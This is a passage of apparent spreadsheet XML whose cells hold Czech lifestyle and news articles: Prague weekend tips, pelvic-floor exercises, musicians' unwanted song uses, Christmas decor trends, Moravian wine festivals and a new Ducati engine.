    <t>Kam o víkendu: Festival papíru, otevřené zahrady nebo lyžování v Praze První listopadový víkend se stírá hranice mezi životem a smrtí. Přichystejte o talíř navíc, zapalte svíčku a zavzpomínejte na své blízké. Oslavit Dušičky můžete také při procházce zahradami při světle loučí, k smrti dobrým divadlem, ochutnávkou zlověstného spooky drinku nebo dobrot z dýní. A taky sobotním koncertem kapely Čtvrt Na Smrt, která zahraje v Kaštanu. P.S. Kam v listopadu v Praze zadarmo? Vybrali jsme 27 akcí . FESTIVAL PAPÍRU To máte notesy, diáře, záložky, sešity, samolepky… Také milujete papírenský sortiment všeho druhu, a ten s kreativním potiskem zvlášť? Pak ani letos nevynechejte Papír Fest na Vltavské, kde se představí více než 80 papírenských značek. Tip partnera CityBeekendu Kultura v metru: O víkendu se projeďte Céčkem. Červená linka pražského metra slaví 50 let od svého otevření. U příležitost jubilea se tu uskuteční zajímavé soutěže, hry, performance, procházky i čištění fontány. Mrkněte na program. (celý víkend) Více➠ZDE Skupinová výstava: Co si přichystala holešovická Trafo Gallery na příští rok? Na skupinové výstavě budou k vidění ukázky z děl současných předních českých výtvarníků, jako je Franta Skála, Alžběta Jungrová , Michael Rittstein ... Vstup zdarma. (celý víkend) Více➠ZDE Večer v zámku: V Libeňském zámku i místním pivovaru oslavíte Dušičky porcí strašidelných němých filmů, speciálními spooky drinky a k smrti dobrým divadlem Lindy Straub, které se za použití nadsázky snaží vrátit téma smrti do běžného života. (sobota) Více➠ZDE Proč do Grébovky : Dýně na všechny způsoby budou k vidění i ochutnání na Dýňobraní v Grébovce . Připravte se na množství kreativních i sportovních aktivit pro děti, dlabání dýní i hudební program. (neděle) Více➠ZDE Otevřené zahrady: Oslavte svátek Dušiček v zahradách pod Pražským hradem s jedinečným výhledem na Prahu . V tento den zahrady osvítí světlo loučí, lamp a svíček a budou připraveny speciální komentované prohlídky zahradami. (sobota) Více➠ZDE ***** NOVINKA GAZDA A ROBA VE ŠVANDOVĚ DIVADLE Když odejde od rodiny muž, vzbudí to rozruch a snad trochu pohoršení. Ale co když rodinu opustí žena? Dva stejné činy, dvě různá hodnocení a dopady. Nová adaptace klasického českého dramatu, která osloví současného diváka, bude mít premiéru již 9. listopadu. Více➠ZDE 1) NOVÝ BURGER Hlad vám spolehlivě zažene nově otevřená pobočka burgrárny Hoxton Burgers na Jiřáku. Kromě vymazlených burgerů vám zde připraví také brunch menu s míchanými vejci v briošce či slané nebo sladké bubble wafle. A dělají tu i skvělé koktejly! Více➠ZDE 2) TICHÁ KRÁSA Jak vnímají lidové umění současní designéři? Mistři starých řemesel a současní kreativci přibližují zapomenutou symboliku artefaktů spojených s obřady, zvyky a magií. K vidění budou porcelánové vánoční ozdoby, kovem zdobené kraslice, výdumky i cígr. Foto: Tomáš Souček Více➠ZDE 3) LYŽOVÁNÍ V PRAZE Předpověď zatím sněhovou nadílku v metropoli neslibuje, ale i tak se můžete vydat na lyže či snowboard. Kousek za Hostivaří funguje ski arena, kde si na trenažéru procvičíte elegantní otočky nebo si tu dáte lekci snowboardingu bez tvrdých pádů do sněhu. Více➠ZDE P.S. Další tipy, kam o víkendu vyrazit s dětmi, najdete v našem článku ZDE . ***** V rubrice TIP DNE na každý den vybíráme jedno místo, kam se vyplatí zajít – například nově otevřený podnik nebo akci, která brzy skončí, ale neměli byste ji zmeškat. Tipy na další dny od pondělí dál najdete na webu v sekci ZÁŽITKY. Kam v PÁTEK: Ochutnejte špagety míchané v bochníku parmezánu Kam v SOBOTU: Nová výstava plná starých věcí Kam v NEDĚLI: Oslavte Svatohubertské slavnosti na zámku V USA vrcholí nejen prezidentské volby, ale taky šílenství zvané Leaf peeping – kdy lidé jezdí za krásami podzimní přírody do New Hampshire nebo Maine . Vy se můžete podobně kochat z teras a oken nové fusion restaurace Semmering v Hlubočepích , popíjet přitom svařené víno podle speciálního receptu a ochutnávat podzimní menu. Návštěvu restaurace doporučujeme spojit s procházkou po Prokopském údolí, kde se můžete v podzimních barvách doslova vykoupat. Dominantou interiéru jsou velká panoramatická okna, která poskytují nádherné výhledy na Hlubočepské plotny. Restaurace je situována na vyvýšené terase, odkud si můžete vychutnat i rudý západ slunce. Sezónní menu se průběžně obměňuje. Dáte si dýňové gnocchi se smetanovou omáčkou? Tip partnera CityBeekendu Autor: Citybee || Nux s.r.o. (www.nux.cz) Rubrika transition_slide doporučujeme</t>
  </si>
  <si>
    <t>2170</t>
  </si>
  <si>
    <t>2130</t>
  </si>
  <si>
    <t>20241101_406_3242178834_47e7589d17277062e84a.html</t>
  </si>
  <si>
    <t>47e7589d17277062e84a</t>
  </si>
  <si>
    <t>Lidé nad 50 let: Toto jednoduché cvičení vás ochrání před problémy s únikem moči</t>
  </si>
  <si>
    <t>Lidé nad 50 let: Toto jednoduché cvičení vás ochrání před problémy s únikem moči inkontinence, Kegelovy cviky, noshp, pánevní dno, prevence, samovolný únik moči, zdraví Lidé nad 50 let se často setkávají s různými fyzickými změnami, které mohou ovlivnit kvalitu jejich života. Jedním z méně příjemných, ale velmi častých problémů je inkontinence. Ačkoli se o tomto tématu stále málo mluví, je důležité si uvědomit, že existují efektivní způsoby, jak tomuto problému předcházet a jak se s ním vyrovnat. Mezi nejúčinnější metody patří pravidelné cvičení zaměřené na posílení svalů pánevního dna. Pánevní dno je soubor svalů a vazů, které se nacházejí v oblasti pánve. Tyto svaly hrají klíčovou roli v udržení kontroly nad močovým měchýřem a konečníkem. S věkem však tyto svaly mohou ochabovat, což vede k problémům s inkontinencí. Proto je důležité věnovat pozornost jejich posilování, a to nejen pro prevenci inkontinence, ale také pro zlepšení celkové stability a zdraví. Cvičení pomáhá Jedním z nejúčinnějších cvičení na posílení pánevního dna jsou Kegelovy cviky. Tyto cviky jsou jednoduché a mohou je provádět muži i ženy. Klíčem k úspěchu je pravidelnost a správná technika. Kegelovy cviky spočívají v napínání a uvolňování svalů pánevního dna. K tomu je dobré si najít pohodlnou pozici, ať už sedíte, ležíte, nebo stojíte. Začněte pomalým stlačením svalů, jako byste se snažili zastavit tok moči. Držte napětí po dobu 5 sekund, poté uvolněte a odpočiňte si po dobu 5 sekund. Opakujte tuto sérii 10 až 15krát. Jakmile se cítíte pohodlně, můžete zvyšovat počet opakování a dobu napětí. Důležité je cvičit alespoň třikrát týdně, aby se dosáhlo znatelného pokroku. Pohyb a speciální cviky na posílení pánevního dna – účinný nástroj v boji proti inkontinenci, zdroj: Shutterstock Dalším skvělým cvičením pro posílení pánevního dna je jóga. Určité jógové pozice, jako je například „most“ nebo „kočka“, jsou vynikající pro aktivaci svalů pánve. Jóga navíc pomáhá zlepšit flexibilitu a rovnováhu, což může být pro všechny nad 50 let velmi prospěšné. Kromě fyzických výhod jóga také pozitivně ovlivňuje psychickou pohodu, což může pomoci při zvládání stresu, který inkontinenci často zhoršuje. Neméně důležitá je také fyzická aktivita obecně. Chůze, plavání nebo cyklistika mohou přispět k celkovému zdraví a posílení těla. Pravidelný pohyb zlepšuje prokrvení, posiluje svaly a zvyšuje celkovou fyzickou kondici, což může mít pozitivní vliv na pánevní dno. Při fyzické aktivitě je důležité se soustředit na správné dýchání a držení těla. Když se aktivně hýbete, snažte se mít pánevní dno aktivní a zapojené, což podpoří jeho posílení. Zaměřte se také na zdravou stravu a psychickou pohodu Důležitou součástí prevence inkontinence je také věnování pozornosti stravě. Vyvážená a zdravá strava pomáhá udržovat zdravou váhu, což je klíčové pro prevenci tlakových problémů na pánevní dno. Potraviny bohaté na vlákninu mohou pomoci udržovat pravidelnou stolici, což také přispívá k zdraví pánve. Omezte příjem potravin, které mohou způsobovat podráždění močového měchýře, jako jsou kofein, alkohol a kořeněná jídla. Kromě fyzického cvičení a správné stravy je důležité věnovat pozornost i psychické pohodě. Stres a úzkost mohou mít negativní vliv na kontrolu močového měchýře. Cvičení jako meditace, hluboké dýchání nebo tai chi mohou pomoci uvolnit napětí a zlepšit psychickou odolnost. Tím, že se budete cítit lépe psychicky, můžete také snížit riziko vzniku inkontinence. Inkontinence je problém, o kterém se stále málo hovoří, zdroj: Shutterstock Kombinace pravidelných cvičení na posílení pánevního dna, zdravé stravy a péče o psychickou pohodu může výrazně přispět k prevenci inkontinence u lidí nad 50 let. I když se o tomto tématu často nemluví, je důležité se mu věnovat a nezapomínat na něj. Nejenže tím zlepšíte kvalitu svého života, ale také si udržíte aktivní a zdravý životní styl. Věnování času cvičení pánevního dna a celkové fyzické aktivitě může mít zásadní vliv na vaše zdraví a pohodu. Proto se nebojte investovat do svého zdraví a začněte s těmito cvičeními už dnes. Případné obavy z inkontinence se tak mohou stát minulostí, a vy si budete moci užívat život naplno, bez stresu a s pocitem jistoty. [seznam-ads id="63251"] [seznam-ads id="63250"] [seznam-ads id="64854"] [seznam-ads id="64868"] Autor: Adriana Singerová Autor person Adriana Singerová Rubrika transition_slide Nejnovější zprávy</t>
  </si>
  <si>
    <t>20241101_407_3243207498_80a9b3321475afa1a051.html</t>
  </si>
  <si>
    <t>80a9b3321475afa1a051</t>
  </si>
  <si>
    <t>5 míst, kde nechcete slyšet svoji hudbu</t>
  </si>
  <si>
    <t>5 míst, kde nechcete slyšet svoji hudbu Kromě hudebních introvertů, kteří tvoří hudbu, aniž by zároveň měli potřebu ji s kýmkoli sdílet, touží většina hudebníků už z podstaty svoji hudbu nabídnout posluchačům. Ať už v podobě nahrávek nebo živých koncertů, chtěli bychom, aby to, co vytvoříme, v lidech nějak rezonovalo, přineslo jim radost nebo se jich dotklo. Až v interakci s publikem či posluchačem je hudební dílo jaksi kompletní... I proto se snažíme dostat svoji hudbu „do světa“ často všemi možnými i nemožnými způsoby a radujeme se, kdykoli se nám podaří umístit song do nějakého playlistu, hitparády, filmu nebo soutěže neobjevených talentů. Protože všechno se přece počítá... Anebo ne? Pojďme se teď podívat na některá místa a situace, ve kterých se se svojí hudební tvorbou ocitnout přeci jen nechceme. 1. Pražská šunka v akci a nyní si dáme písničku Přiznám se hned na začátku, že inspirací k napsání tohoto článku byl nákup v nejmenovaném supermarketu v místě mého bydliště. Jejich playlist by, pravda, vydal, na několik článků – například o vztahu kvality českých potravin a kvality současných českých písňových textů. Nebo na sociologickou úvahu o tom, proč vůbec k nákupu másla, ponožek, nebo granulí pro psa potřebujeme hudební kulisu. Protože tady už samozřejmě ani trochu nejde o interakci či působení na posluchače ve smyslu hudebního sebevyjádření autora písně. Podstatnější je tempo (střední, aby se dlouho a radostně nakupovalo), nálada (pozitivní, pohodová, ale ne moc emočně vypjatá) a k českým potravinám samozřejmě ty pěkné texty. Všichni si snadno dokážeme spočítat, že pokud chcete být komerčně úspěšným a známým hudebníkem, pak bude vaší snahou dostat se do playlistů mainstreamových rádií. Tím pádem se ale dostáváte i do backgroundu mnoha lukrativních míst, jako jsou benzínové pumpy, supermarkety, čekárny, kadeřnictví... Prostě všude tam, kde má být „pohodová a příjemná atmosféra“. Pro někoho to může být smysluplná cesta, pro jiné typy muzikantů je ale tahle představa těžko stravitelná. Samostatnou kapitolu je pak využití vaší písně v reklamě. Část muzikantů nad tím jistě mávne rukou, všichni se musíme nějak živit. Někomu to bude dokonce připadat jako úspěch – najednou vaši píseň uslyší neskutečné množství lidí. Ale pro určitou část hudebníků je i tohle přes čáru, jakkoli to může být finančně zajímavé. 2. Pozor, a teď vám něco pustím! Sraz spolužáků ze základky, párty v plném proudu a někde mezi starými šlágry ze školních výletů si kamarád, který už má dost upito, vzpomene, že by vlastně mohl pustit nějaký váš song. Nejlíp nějaký metalový nářez. Nebo tichou indiefolkovou baladu. Zkrátka něco, co se vyloženě hodí do probíhajícího 80's mejdanu. Jsem si skoro jistá, že přestože byste vlastně většinu těch lidí celkem rádi pozvali na koncert a poklábosili s nimi o kapele, tahle situace vás ani trochu nepotěší. Stejně tak když se třeba uprostřed probíhající oslavy dědečkových sedmdesátin nějaký škodolibý bratranec nebo pyšná maminka rozhodnou pustit celému příbuzenstvu záznam koncertu vaší punkové kapely. Všechny podobné situace mají jedno společné. Vaše hudba je prezentována v kontextu, který jste si nevybrali, a někým jiným, než jste vy. Nemáte nad tím žádnou kontrolu a nemůžete s tím nic moc udělat. Samozřejmě, někdy nás podobné nečekané momenty můžou i potěšit, častěji jsou ale zdrojem ne úplně příjemných pocitů. 3. People buy views Do kategorie nevítaného PR působení ze strany vašich přátel, kolegů či rodinných příslušníků může patřit i jejich jistě dobře míněná snaha zvýšit váš dosah na sociálních sítích. Vy investujete čas, peníze a velké úsilí, abyste nahráli kvalitní nahrávku, vychytali co nejlepší mix, opatřili ji pokud možno profesionálním videoklipem, vydali ji v ten nejlepší okamžik a celé to působilo, jako že to s hudbou myslíte opravdu vážně. A zatímco vaše dílo pomalu sbírá „views“ na YouTube, vaše kolegyně, která má shodou okolností několik tisíc sledujících, přijde na koncert a ze zadní řady za sloupem natočí video na telefon zrovna ve chvíli, kdy to zpěvákovi ujede, kytaristka zapomene nastoupit v sóle a bubeník ztratí paličku. Třicet sekund tohoto kvalitního materiálu, podpořeného dotazem jejího přítele, jestli chce přinést pivo , pak zavěsí na všechny své profily a ejhle, během několika hodin máte víc shlédnutí, než jste za uplynulý měsíc nasbírali u všech svých písniček dohromady. Nemáte radost? Všechen dosah se přece počítá! 4. Hele, ale tohle už jsem někde slyšel Nikdo z nás nechce zaslechnout „svůj“ hudební nápad na desce jiné, ještě ke všemu známější kapely. Známe to asi všichni... Jakoby odnikud se při jamování objeví riff, akordový postup nebo melodie, zní to slibně. Z toho by mohl být super song! V lepším případě vás ve zkušebně velice rychle zchladí někdo ze spoluhráčů: „ Ty vole, vždyť tenhle riff je přesně na druhé desce Deep Purple!“. Sice máte radost, že jste vymysleli něco stejně geniálního jako Ritchie Blackmore , ale to je tak všechno, čím se můžete utěšovat. V horším případě si nikdo z kapely ničeho nevšimne. Nevšimne si ani producent, zvukař a těch pár kamarádů, kterým pustíte nahrávku před vydáním. Všimne si až kontrolní algoritmus na You Tube. Anebo ani ten ne a pokud jste lokální česká kapela, máte celkem slušnou šanci, že ten svůj song i s riffem od „párplů“ budete šťastně hrát na koncertech, dokud vás na to nějaký šťouravý fanoušek neupozorní. Větší problém máte, pokud jste hvězdou světového formátu. Z hudební historie si jistě vybavíte mnoho sporů o „krádeže“ písní či hudebních motivů. Například píseň My Sweet Lord, kterou George Harisson nahrál na svou první sólovou desku, vyvolala mnoho let trvající soudní spor se skupinou The Chiffons, jejichž skladbu He's So Fine údajně Harisson okopíroval. Přestože to soud nakonec nazval „podvědomým plagiátorstvím“, musel žalovaný brouk zaplatit přes půl milionu dolarů. 5. A nakonec... ne, tohle opravdu nechcete Máloco dokáže hudebníky všech žánrů či národností tak rozlítit, jako když jejich hudbu použije bez jejich souhlasu nějaký politik ve svém volebním spotu, kampani či videu „na socky“. I když je to politik strany, kterou by snad mohl dotyčný interpret volit, je to vždy trochu (a někdy hodně) tenký led. Politici před volbami honí body, kde se dá, a tak se logicky nabízí jich otevřeně či podprahově získat pár navíc, když se politický kandidát trochu „sveze“ na vlně popularity nějakého známého hudebníka. Pokud s tím dotyčný umělec souhlasí a otevřeně politika podpoří, pak je vše v pořádku. Často se ale, muzikanti (kupodivu, že?) do politických pletek nehrnou – a pak se nabízí si písničku prostě „vypůjčit“. V USA si dokonce organizátoři kampaní mohou vyžádat souhrnné licence na provozování hudby, jejíž autoři pak mají jen málo právních možností, jak jim v tom zabránit. Nezbývá, než se veřejně ohradit, jako to udělal například Neil Young , když se Donald Trump rozhodl zařadit jeho píseň Rocking In The Free World do svého volebního „playlistu“. Stejně se proti němu vymezili třeba Aerosmith s písní Dream On nebo R.E.M., když Trump v kampani použil jejich It's The End Of The World As We Know It (And I Feel Fine). Vcelku nepřekvapivě nejvíc „problémů“ mají autoři písní typu Born In The USA – Bruce Springsteen se musel proti politickému využití písně bránit opakovaně. Fascinující výčet písní uzurpovaných politiky najdete třeba v tomto článku. V našich končinách se do podobné situace v nedávné době dostala třeba zpěvačka Pam Rabbit, jejíž píseň Space si laskavě „zapůjčil“ Andrej Babiš pro svůj spot, kde za zvuku písně pojídá švestkový koláč. Zpěvačku tím samozřejmě nepotěšil a ohradila se. Stejně tak se rapper Rohony dostancoval od organizace Mladá ODS , která si pro svůj kongres „vypůjčila“ jeho typický pozdrav. Žádný hudebník zkrátka není rád, když se jeho tvůrčí práce stane nástrojem něčího politického marketingu. Když už to musí být, pak je mnohem zábavnější, když se politický projev stane nástrojem hudebníka jako v následující nahrávce. Zpěvačka kapely Taste The Lemon, sólová kytaristka, autorka písní, architektka... Hudba je pro mě prostor absolutní svobody a radosti, který jen velmi nerada opouštím. … Odebírej newsletter pro aktivní muzikanty 🎶 Zajímáš se o hudební dění a chceš být v obraze? Zadej níže svůj e-mail a my ti pošleme pravidelnou dávku muzikantských zajímavostí a novinek každý měsíc přímo do tvé pošty. E-mailová adresa Autor: Tereza Karásková Autor person Tereza Karásková</t>
  </si>
  <si>
    <t>1790</t>
  </si>
  <si>
    <t>20241101_408_3242273842_7c35e67c1a84511ac667.html</t>
  </si>
  <si>
    <t>7c35e67c1a84511ac667</t>
  </si>
  <si>
    <t>Trendy Vánoc 2024: letos tvůj domov ovládnou pastely a příroda</t>
  </si>
  <si>
    <t>Trendy Vánoc 2024: letos tvůj domov ovládnou pastely a příroda Eliška Jedličková (Outdoorová bio kočka) Mňouk Jestli přestanu pít, začnu vraždit. Račte si vybrat. Kdyby bůh chtěl, abychom v noci nejedli, asi by v ledničce nebylo světýlko, ne? Já jsem vlastně dobrý člověk. Když někoho pošlu do p*dele, celý den pak přemýšlím, jestli tam v pořádku dorazil. Mým nejoblíbenějším členem rodiny je pes. Ten se neptá, kdy si hodlám najít chlapce a vdát se. Trendy Vánoc 2024: letos tvůj domov ovládnou pastely a příroda Shutterstock Zajímavosti „Vánoce jsou o pocitu,“ říkáme si každý rok. „Nepotřebujeme další světla a ozdůbky,“ opakujeme si. Jenže vysvětluj tohle svému vnitřnímu dítěti, když rok co rok jsou trendy jeden hezčí než druhý. A letos tomu není jinak… Jasně, když jde o Vánoce, je všechno individuální. Někdo miluje purpuru a jinému se z ní zvedá žaludek. Někdo jede koledy už od října, jiný človíček si je nepustí ani na samotný Štědrý den. Jedna rodina zbožňuje živé vánoční stromky až ke stropu, jiná si hýčká svůj letitý umělý vánoční stromeček velikosti fíkusu. Někde se lije olovo, jinde sváteční víno . Někdo hází bačkorou, jinému jsou už po dvacáté bačkory opět dárkem. Jedna domácnost bliká jako Las Vegas , druhá ještě pořádně ani nevyměnila ten letní věnec, který na dveře pověsila v červnu. OBSAH ČLÁNKU: Když návrat k přírodě, tak luxusně Trendy barvy: pastely a ledové tóny Vintage styl i boho Udržitelnost, kam se podíváš A tak to zkrátka s Vánoci je. Každý to máme nastavené úplně jinak a je to tak absolutně v pořádku. Nikdo, díky bohu, nemůže nikomu nic diktovat a všichni si trávíme a krášlíme Vánoce po svém. Podléhat tak jakýmkoliv trendům není potřeba ani během času vánočního. A už vůbec není nutné, aby se z nich kdokoli dostával pod tlak nebo do stresu. Je úplně v pohodě trendy neřešit. Pokud ale k milovníkům vánočních trendů naopak jasně patříš a už je netrpělivě očekáváš a vyhlížíš od letní dovolené, máme je pro tebe právě teď. Jásej. Je jich dost a všechny ti představíme pěkně do detailu. Vánoce v duchu DIY: potěš dárkem vlastní výroby Když návrat k přírodě, tak luxusně Vánoce 2024 vrací do hry jednoduchost a přírodní estetiku, avšak s důrazem na detail a drobný luxus. Klidně tak můžeš zůstat v minimalismu a dřevěné sobíky na krbovou římsu vystav i letos. Dřevo totiž pofrčí hodně a promítne se do nejrůznějších směrů výzdoby. Od hvězd, betlémů, komet i vesniček až po nejrůznější celistvá aranžmá. Letos ale na těchhle dřevěných prvcích zpravidla najdeš něco třpytivého. Ať už půjde o třpytky, stříbřička, nebo světýlka, vždycky tam nějaké to vylepšení bude. A takhle to s návratem k výzdobě přírodního ražení bude letos o Vánocích celkově. V přímém přenosu se nám tak bude snoubit jehličí se stříbrnými prvky, šišky na věnci se zlatými stužkami, přírodní textilie se zdobnými vánočními sponami. Kombinaci už si určíš sama a tvým úkolem bude naslouchat především svému kreativnímu já. Stačí si proto zapamatovat, že letos kombinuješ přírodu a něco málo z luxusu, chceš-li být in. shutterstock_2365604807.jpg Letos můžeš zase vsadit na dekorace z papíru. Trendy barvy: pastely a ledové tóny Letošní paleta sice slibuje výrazné osvěžení, ale zároveň duch Vánoc zřejmě nechce přivodit infarkt nám konzervativním lidem, takže barvy navazují na osvědčené klasiky. Decentní a rafinovanou novinkou tak budou ledové pastely. V praxi to znamená, že si letos svou vlastní vánoční „bytovesničku“ okrášlíš: světle modrou jemně růžovou levandulovou broskvovou smaragdově zelenou zlatou bronzovou Klid, klid, jen žádnou paniku. Barvy jsou to na první dobrou výrazné, ale nezapomínej, že ledové tóny nejsou křiklavé. Naopak. Tyhle barvy v kombinaci se třpytivými a zrcadlovými prvky navodí pocit klidu, čistoty a slavnostní nálady. Teplejší odstíny z našeho vánočního seznamu pak uspokojí tvůj hlad po klasickém hřejivém nádechu. Domácí vůně: vsaď na vařené jablko se skořicí Vintage styl i boho Z osvědčených stylů se letos taky příliš neuhýbá. Na prvních trendy příčkách tak už několikátým rokem zůstává svatá trojice v podobě skandinávského stylu, vintage elegance a boho. Skandinávský styl nadále vládne a letos se nese v duchu udržitelnosti. Důraz se klade především na přírodní materiály, jako jsou dřevo, kámen nebo len. Nezapomíná se ani na jednoduché linie. Tenthle styl je skvělou volbou pro toho, kdo upřednostňuje jednoduchost a citelný klid. Pokud máš ráda nostalgické prvky, vánoční dekorace inspirované 50. a 60. lety minulého století tě nadchnou. Starobylé ozdoby, ručně malované baňky a vyšívané dečky dodají interiéru jedinečný půvab a ty se vrátíš do časů, kdy vánoční atmosféra byla o kouzlu rodinných tradic. Je-li tvé duši milé právě tohle, půjdeš zřejmě cestou stylu vintage elegance. Boho -chic styl razí svobodu a originalitu. Kombinuje prvky přírody, jako jsou sušené květiny, makramé, krajky a ručně vyráběné dekorace. Vánoce v boho stylu jsou sice přirozené, ale zároveň lehce divoké a plné barev. Nebudou tedy pro každého, ale masu fanoušků už několik let prokazatelně mají. Za těmihle trendy styly samozřejmě nijak nezaostává ani styl klasický. Ten z módy nevyjde nikdy a s naprosto klidným svědomím tak můžeš letos vytáhnout z vánočních krabic to, co už máš doma deset let. shutterstock_2050083455.jpg Co jsi nevěděla o jmelí: přinese štěstí, sníží krevní tlak a zajistí věčnou lásku Udržitelnost, kam se podíváš I taková udržitelnost je něčím, co už boduje hezkých pár let. Společnost totiž čím dál víc přemýšlí nad otázkou, jak se obecně chovat šetrněji a udržitelněji. Totéž pak platí v souvislosti s Vánoci a tenhle trend se nám nejvíc promítá do recyklace nejrůznějších materiálů při balení dárků. Už jsme balili do novin, do pečicího papíru, do zbytků papírů z minulého roku, do látky, do ubrousků i do kousků starého povlečení. I tohle všechno je letos zase v kurzu. Pokud snad chceš v tomhle ohledu zajít ještě dál, zaměř se i na další znovupoužití. Soustřeď se třeba na: papírové ozdoby látkové baňky slaměné dekorace řetězy ze sušených prvků, které v předchozích letech krášlily věnce přírodní svícny ozdůbky z korku girlandy ze šišek drobné proutěné dekorace sušené pomeranče coby závěsné dekorace prostírání z ubrousků z uplynulých let svíčky, které sama vyrobíš ze zbytků jiných svíček závěsné koule z pomerančové a citrónové kůry závěsné ozdůbky z badyánu a skořice Jak už tedy sama dobře víš, není proč se stresovat, jak tomu mnohdy bývá. Letošní trendy nabízejí spoustu různých možností, a není proto možné, aby se tvému srdci některý nezamlouval. A pokud jsi snad stále na vážkách, vsaď na klid, pohodu, střídmost a užívání si přítomného okamžiku. S tímhle totiž o Vánocích vedle nešlápneš v žádné době. Už máš letos jasno v tom, kterou cestou se na Vánoce 2024 vydáš? Autorka článku: Bára Klímová Použité zdroje: cs.wiktionary.org/wiki/Christmas simple.wikipedia.org/wiki/Christmas marthastewart.com/8339182/outdated-holiday-decor-trends gathered.how/papercraft/diy-paper-christmas-ornaments Autor: Blogger</t>
  </si>
  <si>
    <t>2570</t>
  </si>
  <si>
    <t>1840</t>
  </si>
  <si>
    <t>20241101_409_3242137577_190c6fef4576ed67cce4.html</t>
  </si>
  <si>
    <t>190c6fef4576ed67cce4</t>
  </si>
  <si>
    <t>Na Svatomartinská vína dřív do Znojma i Hodonína</t>
  </si>
  <si>
    <t>Na Svatomartinská vína dřív do Znojma i Hodonína 1. listopadu 2024 8:00 Už v sobotu 9. listopadu ožije Masarykovo náměstí ve Znojmě Svatomartinskými slavnostmi. Symbolicky v 11 hodin začnou nabízet své produkty vinaři z okolí, chybět nebude cimbálová muzika ani průvod sv. Martina , který vyrazí v 16 a 17 hodin z náměstí. Dojde i na inscenovanou scénku, kdy svatý Martin mečem rozdělí svůj plášť na poloviny a jednu věnuje žebrákovi. Vstup na akci je volný. Ve stejný den se od 11.11 hodin budou konat Svatomartinské slavnosti i v Hodoníně . Kromě ochutnávky se na Masarykově náměstí koná také trh regionálních produktů. | foto: MAFRA Brno Výstaviště se promění v karavanový kemp V čem nejraději cestuje herečka Vanda Hybnerová , která letos objela Balkán , nebo jaký obytný vůz je nejdražší a proč? Odpovědi nabídne mezinárodní výstava karavanů a obytných automobilů Caravaning Brno na výstavišti od čtvrtka 7. do neděle 10. listopadu. Návštěvníky čeká čtyřdenní přehlídka obytných automobilů, karavanů či příslušenství. Součástí doprovodného programu jsou cestovatelské přednášky, besedy a technické poradenství. Zajímavosti z cest přiveze třeba i Pepa Vrtal alias populární Fotr na Tripu. Nebude chybět ani bazar karavanů a Caravan Park nabídne možnost přespání. Břeclavsko Myslivci předvedou výcvik psů i dravců, mají svátek Prostor kolem kaple sv. Huberta v Bořím lese Lednicko-valtickém areálu rozezní v neděli 3. listopadu trubači. Od 15.00 hodin se tam bude konat XV. Svatohubertská mše. Doprovodný program, při kterém myslivci představí výcvik loveckých psů a dravců, začne o hodinu dříve. Mše mají dlouhou tradici a myslivci je pořádají jednou ročně, aby složili poctu svému patronovi – svatému Hubertovi . Právě na 3. listopadu připadá jeho svátek. Kapli sv. Huberta nechali v roce 1855 postavit Lichtenštejnové a už tehdy se u ní konaly slavnostní mše zahajující lov při slavnostním mysliveckém dni. Autor: pru, pjk Autor: Jiří Pruša, pjk Autoři Jiří Pruša person pjk Rubrika transition_slide Metro - Jihomoravský kraj</t>
  </si>
  <si>
    <t>20241101_41_3264641231_8462694391ffffa174df.html</t>
  </si>
  <si>
    <t>8462694391ffffa174df</t>
  </si>
  <si>
    <t>ČEZ: Rybářské slavnosti na Hluboké vyšly na jedničku. Letos se lovil Munický rybník</t>
  </si>
  <si>
    <t>20241101_410_3242137573_a5f1396fc7eeeb53c853.html</t>
  </si>
  <si>
    <t>a5f1396fc7eeeb53c853</t>
  </si>
  <si>
    <t>Nový dvouválec od Ducati ztratil hmotnost i desmodromické rozvody</t>
  </si>
  <si>
    <t>Nový dvouválec od Ducati ztratil hmotnost i desmodromické rozvody „Ducati stále věří v 90° V-twin a investuje do něj.“ zní úvodní slova tiskovky, která představuje nový vidlicový dvouválec. Ten je vůbec nejlehčím motorem V2, který kdy vyjel z fabriky v Borgo Panigale, a zároveň nejpokrokovějším. Nejedná se nicméně o náhradu motoru Superquadro do nové Panigale. Svými výkony totiž nový motor směřuje do obchodně větších segmentů, kde má Ducati třeba Hypermotard, Supersport nebo Monster. Není zapnut JavaScript. Tento text má být nahrazen přehrávačem. A pojďme rovnou probrat tu nejzásadnější změnu – ano, u nového dvouválce se Ducati zbavila desmodromických rozvodů s ozubenými řemeny. Jejich absence sice nakrkne celou řadu puristů, na druhou stranu je potřeba nalít si čistého vína – Ducati byla jedinou značkou v automotive segmentu, která desmodromické rozvody používala, a reálně už pro to neexistoval z pohledu techniky žádný důvod. Jedná se tedy výhradně o ztrátu na poli „tradic“, kterou nový motor bohatě vynahrazuje na poli servisu. Velký servis s kontrolou ventilových vůlí se dělá po konvenčních 30 000 kilometrech, tedy s každým druhým olejem, a bezúdržbové řetězy není potřeba měnit periodicky i na motorkách, které vůbec nejezdí, tak jako tomu bylo u stávajících řemenů. U rozvodů ještě zůstaneme, neboť přechod na konvenční techniku moc neubral z jejich zajímavosti. Jde o DOHC – tedy se čtyřmi ventily na válec a s dvojicí vačkových hřídelů v každé hlavě – přičemž vahadla mají povlak DLC (tvrdá povrchová úprava Diamond-Like Coating) a samotné sací ventily mají duté dříky. Hlavně se ale na sacích vačkách se nachází variátory variabilního časování sacích ventilů . Ty pracují s natočením v rozmezí 52° a motor by měl nabízet velmi lineární přísun točivého momentu, dostupného v širokém rozsahu otáček. Přes 70 % z maxima je k mání ve 3 000 otáčkách, a v rozmezí od 3 500 do 11 000 za minutu točivý moment nikdy nepadá pod 80 % maxima. Hodnota krouťáku nicméně závisí na variantě motoru. Ducati nabídne slabší, která má 115 koní v 10 750 otáčkách a 92,1 Nm v 8 250 otáčkách , případně silnější s výkonem 120 koní a točivým momentem 93,3 Nm – otáčky zůstávají stejné. Slabší varianta má silnější alternátor , větší setrvačník pro dodatečnou linearitu, a taky kratší první a druhý převodový stupeň – patrně bude určená do cestovnějších strojů. Silnější varianta zase nabídne možnost přikoupení nehomologovaného okruhového výfuku , který přidá 6 koní a 5 Nm, a souběžně ušetří 4,5 kilogramu hmotnosti. Podobně jako v případě motoru Superquadro, jsou hliníkové vložky válců vložené přímo do karterů bloku – nejsou tu tedy samostatné válce. Hodnota vrtání je 96 milimetrů a zdvihu 61,5 milimetrů , což znamená zdvihový objem 890 cm3 a také to, že poměrem vrtání/zdvih spadá nový motor mezi agregáty Testastretta a Superquadro. Má víc síly v nejvyšších otáčkách než Testastretta, ale lineárnější průběh točivého momentu než Superquadro. Celková hmotnost motoru je pouze 54,4 kilogramu , což jej dělá o 9 kilogramů lehčí než 